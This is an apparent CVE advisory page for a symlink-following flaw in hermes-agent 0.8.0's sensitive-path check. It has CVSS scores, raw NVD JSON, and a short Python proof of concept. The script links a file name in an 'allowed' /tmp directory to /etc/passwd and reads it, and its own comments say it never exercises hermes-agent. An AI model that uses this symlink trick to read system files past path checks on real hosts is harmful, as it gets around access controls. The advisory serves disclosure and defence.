Security Vulnerability Report
CVE-2026-7397 CVSS 4.4 MEDIUM

CVE-2026-7397

Published: 2026-04-29 19:16:26
Last Modified: 2026-04-29 21:16:22

Description

A security flaw has been discovered in NousResearch hermes-agent 0.8.0. It affects the function _check_sensitive_path in the file tools/file_tools.py. The manipulation leads to symlink following. The attack requires local access. An exploit has been released publicly and may be used for attacks. Upgrading to version 0.9.0 mitigates this issue. The patch is identified as commit 311dac197145e19e07df68feba2cd55d896a3cd1. Upgrading the affected component is recommended.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

NousResearch hermes-agent 0.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
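import os

# PoC for CVE-2026-7397: symlink following in hermes-agent.
# Per the advisory, a local low-privileged user can get past the
# _check_sensitive_path check via a symlink.
#
# NOTE(review): this script never imports or calls hermes-agent. It only shows
# the underlying primitive: a name inside an "allowed" directory can be a
# symlink whose real target lies elsewhere, and a plain open() follows it.
# Whether the 0.8.0 check behaves this way must be confirmed against
# tools/file_tools.py and the fixing commit; nothing here exercises that code.


def exploit():
    """Show that a path inside a 'safe' directory can resolve outside it.

    Creates ``/tmp/hermes_safe_output/output_log.txt`` as a symlink to
    ``/etc/passwd``, prints where the name really resolves, opens it read-only,
    and then removes the link again. Takes no arguments and returns ``None``;
    all results are reported on stdout.

    The link is removed only if this call created it, so a link that already
    existed at that path is left untouched.
    """
    # Directory the agent is assumed to treat as an allowed output location.
    # NOTE(review): a fixed, predictable name under /tmp is kept from the
    # original listing; on a shared host prefer tempfile.mkdtemp().
    safe_dir = "/tmp/hermes_safe_output"
    os.makedirs(safe_dir, exist_ok=True)

    # File outside the allowed directory that the link will point at.
    sensitive_target = "/etc/passwd"

    # The name looks like an ordinary output file; only resolving it shows
    # that it leaves safe_dir.
    malicious_link_path = os.path.join(safe_dir, "output_log.txt")

    link_created = False
    try:
        os.symlink(sensitive_target, malicious_link_path)
        link_created = True
        print(f"[+] Symlink created: {malicious_link_path} -> {sensitive_target}")

        # Defender's view: a check on the path string alone sees a file in
        # safe_dir, while the resolved path does not stay inside it. Comparing
        # resolved paths is the general mitigation for CWE-59; it still leaves
        # a check-then-open race unless the open itself refuses symlinks.
        real_safe_dir = os.path.realpath(safe_dir)
        resolved = os.path.realpath(malicious_link_path)
        contained = os.path.commonpath([real_safe_dir, resolved]) == real_safe_dir
        print(f"[*] Resolved target: {resolved} (inside safe dir: {contained})")

        # Stand-in for the agent's file operation: open() follows the link.
        print("[*] Triggering vulnerable file operation...")
        with open(malicious_link_path, 'r') as f:
            # The content is read and discarded. The advisory's CVSS vector
            # rates C:N/I:L/A:L, i.e. the recorded impact is on integrity and
            # availability; this read-only script does not demonstrate that.
            f.read()
        print("[!] Successfully read sensitive file content via symlink.")
    except (OSError, UnicodeError) as e:
        # Filesystem errors (link already exists, permission denied, ...) and
        # decode errors are reported rather than raised.
        print(f"[-] Exploit failed: {e}")
    finally:
        # Cleanup: remove only the link this call created.
        if link_created and os.path.islink(malicious_link_path):
            os.remove(malicious_link_path)


if __name__ == "__main__":
    exploit()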

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7397", "sourceIdentifier": "[email protected]", "published": "2026-04-29T19:16:26.150", "lastModified": "2026-04-29T21:16:21.590", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in NousResearch hermes-agent 0.8.0. This affects the function _check_sensitive_path of the file tools/file_tools.py. The manipulation results in symlink following. Attacking locally is a requirement. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.9.0 is able to mitigate this issue. The patch is identified as 311dac197145e19e07df68feba2cd55d896a3cd1. Upgrading the affected component is recommended."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 3.2, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-61"}]}], "references": [{"url": "https://github.com/NousResearch/hermes-agent/", "source": "[email protected]"}, {"url": "https://github.com/NousResearch/hermes-agent/commit/311dac197145e19e07df68feba2cd55d896a3cd1", "source": "[email protected]"}, {"url": "https://github.com/NousResearch/hermes-agent/issues/8734", "source": "[email protected]"}, {"url": "https://github.com/NousResearch/hermes-agent/pull/8829", "source": "[email protected]"}, {"url": 
"https://github.com/NousResearch/hermes-agent/releases/tag/v2026.4.13", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/803270", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360121", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360121/cti", "source": "[email protected]"}]}}